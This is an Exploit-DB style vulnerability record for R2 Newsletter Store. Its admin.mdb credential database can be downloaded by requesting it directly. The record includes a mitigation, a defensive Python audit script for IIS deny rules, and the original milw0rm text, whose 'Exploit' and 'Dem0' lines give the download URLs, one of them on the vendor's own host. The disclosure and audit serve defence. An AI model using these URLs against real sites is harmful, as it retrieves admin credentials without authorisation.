Vendor: R2 Newsletter Store
By: TiGeR-Dz
CVSS: 7.5 (HIGH)
Title: Remote Admin Disclosure Vulnerability
CWE: 200
Product Name: R2 Newsletter Store
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

R2 Newsletter Store (admin.mdb) Remote Admin Disclosure Vulnerability

An attacker can retrieve the admin.mdb database by requesting it directly from the same directory as the admin.asp page of the R2 Newsletter Store script. The file contains sensitive information such as usernames and passwords.

Mitigation:

Ensure that the admin.mdb file is not accessible from the web server and that access to the admin.asp page is restricted to authorized users.
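
A local audit for the mitigation above, as an added example that is not part of the original advisory or the vendor's code: it walks a web root on disk and lists database files that no IIS `requestFiltering` deny rule in a `web.config` at or above their directory covers. The extension list, the sample tree and the simplified inheritance (server-level configuration and `<remove>`/`<clear>` overrides are ignored) are assumptions.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

DB_EXTENSIONS = {".mdb", ".accdb"}  # assumed list of file-based database types

WEB_CONFIG = """<configuration><system.webServer><security><requestFiltering>
  <fileExtensions><add fileExtension=".mdb" allowed="false" /></fileExtensions>
</requestFiltering></security></system.webServer></configuration>"""  # constructed sample

def denied_extensions(directory):
    """Extensions that a web.config in `directory` denies via requestFiltering."""
    path = os.path.join(directory, "web.config")
    if not os.path.isfile(path):
        return set()
    try:
        root = ET.parse(path).getroot()
    except ET.ParseError:
        return set()  # unreadable config: assume it protects nothing
    rules = root.findall(".//requestFiltering/fileExtensions/add")
    return {r.get("fileExtension", "").lower() for r in rules
            if r.get("allowed", "true").lower() == "false"}

def exposed_databases(web_root):
    """URL paths of database files under web_root not covered by a deny rule."""
    web_root = os.path.abspath(web_root)
    inherited, exposed = {}, []  # inherited: dir -> extensions denied at or above it
    for current, _dirs, files in os.walk(web_root):
        parent = inherited.get(os.path.dirname(current), set())
        inherited[current] = parent | denied_extensions(current)
        for name in files:
            ext = os.path.splitext(name)[1].lower()
            if ext in DB_EXTENSIONS and ext not in inherited[current]:
                rel = os.path.relpath(os.path.join(current, name), web_root)
                exposed.append("/" + rel.replace(os.sep, "/"))
    return sorted(exposed)

def demo():
    """Constructed tree: /store has no deny rule, /store_fixed has one."""
    with tempfile.TemporaryDirectory() as root:
        for sub in ("store", "store_fixed"):
            os.makedirs(os.path.join(root, sub))
            for name in ("admin.asp", "admin.mdb"):
                open(os.path.join(root, sub, name), "w").close()
        with open(os.path.join(root, "store_fixed", "web.config"), "w") as f:
            f.write(WEB_CONFIG)
        return exposed_databases(root)

if __name__ == "__main__":
    print(demo())
```

A deny rule only stops the file from being served; moving the database to a directory outside the web root removes it from the finding altogether.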

Exploit-DB raw data:

 ---------------------------------------------------------------
 ---------------------------------------------------------------
R2 Newsletter Store (admin.mdb) Remote Admin Disclosure
 Vulnerability
 ---------------------------------------------------------------
 Founder : TiGeR-Dz
 Home:http:/www.r2newsletter.com
 Script:R2 Newsletter Store 
 Download:http://www.r2newsletter.com/shop/store/dynamicIndex.asp
 ---------------------------------------------------------------
 Exploit:
 -------

 http://www.site.com/[script]/admin.asp

 go to 

http://www.site.com/[script]/admin.mdb
 --------------------------------------
 ----------------------------------------------------------------
 Dem0
 ----
 http://www.r2newsletter.com/statsdemo/admin.asp

 go to 

 http://www.r2newsletter.com/statsdemo/admin.mdb 

 --------------------------------------

 Greeting To ALL My Friends (Dz)

# milw0rm.com [2009-06-01]